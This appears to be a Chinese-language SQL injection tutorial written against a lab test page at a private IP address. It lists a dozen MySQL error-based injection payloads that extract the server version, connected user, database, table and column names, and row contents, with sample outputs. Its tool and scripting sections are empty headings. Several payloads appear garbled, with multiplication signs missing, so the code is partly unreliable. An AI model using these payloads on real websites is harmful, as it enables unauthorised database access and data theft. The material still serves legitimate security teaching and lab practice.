**sql注入**
簡介:所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令。
Target:http://192.168.8.142:8080/test/sqlinsert?id=2
1、判斷目標站點是否存在sql注入漏洞(判斷方法加入永真條件永假條件)
目標站點正常請求的返回界面
http://192.168.8.142:8080/test/sqlinsert?id=2
加入永真條件請求結果
加入永假條件請求結果
2、利用漏洞獲取數據
2.1 手工注入(顯錯)
數據庫版本
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
版本:5.5.531
連接用戶
and(select 1 from(select count(),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
連接用戶:root@localhost
連接數據庫
and(select 1 from(select count(),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
連接數據庫:test
爆庫
and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
爆其他數據庫
and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
修改FROM information_schema.schemata LIMIT 1,1中limit的第一數字遞加
表:
Test 0x74657374
performance_schema:0x706572666f726d616e63655f736368656d61
Mysql:0x6d7973716c
Job:0x6a6f62
Blog:0x626c6f67
information_schema:0x696e666f726d6174696f6e5f736368656d61
爆當前數據表
and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
爆其他數據庫表
and(select 1 from(select count(),concat((select (select (select concat(0x7e,table_name,0x7e))) from information_schema.tables where table_schema=庫名的十六進制 limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
爆其他表
and(select 1 from(select count(),concat((select (select (select concat(0x7e,table_name,0x7e))) from information_schema.tables where table_schema=0x6d7973716c limit 2,1),floor(rand(0)2))x from information_schema.tables group by x)a)(原理同爆其他數據庫)
爆字段(數據庫,表名轉換爲16進制)
and(select 1 from(select count(),concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema=0x74657374 and table_name=0x6a6f62 limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
爆其他字段
and(select 1 from(select count(),concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema=0x74657374 and table_name=0x6a6f62 limit 1,1),floor(rand(0)2))x from information_schema.tables group by x)a)(原理同爆其他數據庫)
爆內容
and(select 1 from(select count(),concat((select (select (select concat(0x7e,id,0x7e,0x7e,name,0x7e))) from test.job limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
2.2 工具
爆數據庫
爆表
爆字段
爆內容
2.3 自己寫腳本注入
爆數據庫
1、分析手工注入的語句構造構造動態查詢語句
2、構造動態查詢語句
3、根據頁面長度分別從前和從後截斷,獲取報錯信息中的數據庫名,並保存到數組中備用
代碼結果如下:
爆表
詳情看代碼註釋
爆字段,爆內容原理同上